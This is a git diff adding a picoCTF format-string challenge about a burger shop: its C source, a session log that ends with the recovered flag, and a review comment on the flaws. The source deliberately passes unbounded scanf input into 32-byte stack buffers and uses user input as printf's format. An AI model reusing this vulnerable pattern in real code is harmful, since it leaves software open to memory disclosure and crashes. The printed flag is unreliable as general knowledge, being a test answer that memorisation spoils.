diff --git a/pwn/format_string_0/format-string-0 b/pwn/format_string_0/format-string-0
new file mode 100755
index 0000000..a2905df
Binary files /dev/null and b/pwn/format_string_0/format-string-0 differ
diff --git a/pwn/format_string_0/format-string-0.c b/pwn/format_string_0/format-string-0.c
new file mode 100644
index 0000000..4fa327c
--- /dev/null
+++ b/pwn/format_string_0/format-string-0.c
@@ -0,0 +1,101 @@
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+char flag[FLAGSIZE];
+
+void sigsegv_handler(int sig) {
+ printf("\n%s\n", flag);
+ fflush(stdout);
+ exit(1);
+}
+
+int on_menu(char *burger, char *menu[], int count) {
+ for (int i = 0; i < count; i++) {
+ if (strcmp(burger, menu[i]) == 0)
+ return 1;
+ }
+ return 0;
+}
+
+void serve_patrick();
+
+void serve_bob();
+
+
+int main(int argc, char **argv){
+ FILE *f = fopen("flag.txt", "r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(flag, FLAGSIZE, f);
+ signal(SIGSEGV, sigsegv_handler);
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+ serve_patrick();
+
+ return 0;
+}
+
+void serve_patrick() {
+ printf("%s %s\n%s\n%s %s\n%s",
+ "Welcome to our newly-opened burger place Pico 'n Patty!",
+ "Can you help the picky customers find their favorite burger?",
+ "Here comes the first customer Patrick who wants a giant bite.",
+ "Please choose from the following burgers:",
+ "Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
+ "Enter your recommendation: ");
+ fflush(stdout);
+
+ char choice1[BUFSIZE];
+ scanf("%s", choice1);
+ char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
+ if (!on_menu(choice1, menu1, 3)) {
+ printf("%s", "There is no such burger yet!\n");
+ fflush(stdout);
+ } else {
+ int count = printf(choice1);
+ if (count > 2 * BUFSIZE) {
+ serve_bob();
+ } else {
+ printf("%s\n%s\n",
+ "Patrick is still hungry!",
+ "Try to serve him something of larger size!");
+ fflush(stdout);
+ }
+ }
+}
+
+void serve_bob() {
+ printf("\n%s %s\n%s %s\n%s %s\n%s",
+ "Good job! Patrick is happy!",
+ "Now can you serve the second customer?",
+ "Sponge Bob wants something outrageous that would break the shop",
+ "(better be served quick before the shop owner kicks you out!)",
+ "Please choose from the following burgers:",
+ "Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
+ "Enter your recommendation: ");
+ fflush(stdout);
+
+ char choice2[BUFSIZE];
+ scanf("%s", choice2);
+ char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
+ if (!on_menu(choice2, menu2, 3)) {
+ printf("%s", "There is no such burger yet!\n");
+ fflush(stdout);
+ } else {
+ printf(choice2);
+ fflush(stdout);
+ }
+}
diff --git a/pwn/format_string_0/output.txt b/pwn/format_string_0/output.txt
new file mode 100644
index 0000000..8cf3b6c
--- /dev/null
+++ b/pwn/format_string_0/output.txt
@@ -0,0 +1,8 @@
+$ nc mimas.picoctf.net 60131
+Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
+Here comes the first customer Patrick who wants a giant bite.
+Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
+Enter your recommendation: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
+There is no such burger yet!
+
+picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_ef312157}
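Review bot: In format-string-0.c, serve_patrick and serve_bob read an unbounded token with `scanf("%s", choice1)` / `scanf("%s", choice2)` into 32-byte stack buffers, then pass the accepted input as the format itself in `printf(choice1)` / `printf(choice2)`, where the menu strings carry `%114d` and `%s` conversions with no matching arguments. For a challenge binary these flaws look intentional, but the file has no comment saying so; I would add a header such as `/* Deliberately vulnerable CTF challenge: unbounded scanf and non-literal printf format; do not reuse. */`. Anyone copying the menu logic elsewhere should use `scanf("%31s", choice1)` and `printf("%s", choice1)`. Separately, sigsegv_handler calls printf, fflush and exit, none of which are async-signal-safe. In main, the fgets result is not checked and `f` is never closed.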